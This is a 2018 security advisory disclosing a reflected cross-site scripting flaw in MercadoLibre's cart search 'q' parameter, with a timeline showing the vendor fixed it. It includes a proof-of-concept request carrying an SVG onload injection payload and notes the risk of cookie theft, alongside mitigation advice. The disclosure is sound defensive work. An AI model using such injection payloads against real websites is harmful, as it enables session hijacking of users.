Original release date: June 8th, 2018
Last revised: June 25th, 2018
Discovered by: Gonzalo Carrasco
Severity: 6.1/10 (CVSSv3 Base Score)
MercadoLibre is an Argentine company dedicated to purchases among registered users of its shopping, sales and Internet payments service. It has operations in each country of origin such as Bolivia, Brazil, Chile, Colombia, Costa Rica, Ecuador, Guatemala, Mexico, Nicaragua, Panama, Peru, Paraguay, Salvador, Dominican Republic, Uruguay, Honduras and Venezuela.
Users can sell and / or auction both new and used products at a fixed or variable price private services are also offered.
PROOF OF CONCEPT
The vulnerable parameter is "q" and the exploitation is through GET method.
The attach works with the parameter "type" set in:
GET /sales/cartSearch?type=recent&q="><svg/onload=alert(8)> HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
<form data-component="actions-search" class="form-search" onsubmit="return false;">
<div id="iePlaceHolder" class="ie-place-holder">Comprador o venta</div>
<input type="text" id="search" name="search" class="txt-search" placeholder="Comprador o venta" value="">
<input type="button" id="searchBtn" value="Buscar" class="ch-btn-skin ch-btn-small">
We can see how the server does not filter the special characters correctly, which allows a malicious user to inject arbitrary code. The "svg" tag entered is embedded within the response of the server, allowing the exploitation of this vulnerability.
The effects of the discovered vulnerability are raised to a medium-critical level, depending on the interaction that is achieved with the victim user and their status, since if at the time of the attack, the user has an active session with his Mercadolibre account, your current cookies could be captured.
MercadoLibre website (vulnerable until June 13th, 2018).
Preventing XSS requires separation of untrusted data from active browser content:
- Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
- For rich content, consider auto-sanitization libraries like OWASPs AntiSamy or the Java HTML Sanitizer Project.
- Consider Content Security Policy (CSP) to defend against XSS across your entire site.
Reference: XSS (Cross Site Scripting) Prevention Cheat Sheet
This vulnerability has been discovered by Gonzalo Carrasco (pgcarrasco <at> isecauditors.com).
June 8th, 2018: Initial release
June 8th, 2018: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
June 8th, 2018: Contact with MercadoLibre.
June 8th, 2018: Answer from MercadoLibre.
June 13th, 2018: Vulnerability corrected by MercadoLibre.
June 25th, 2018: Advisory published.
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.
Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.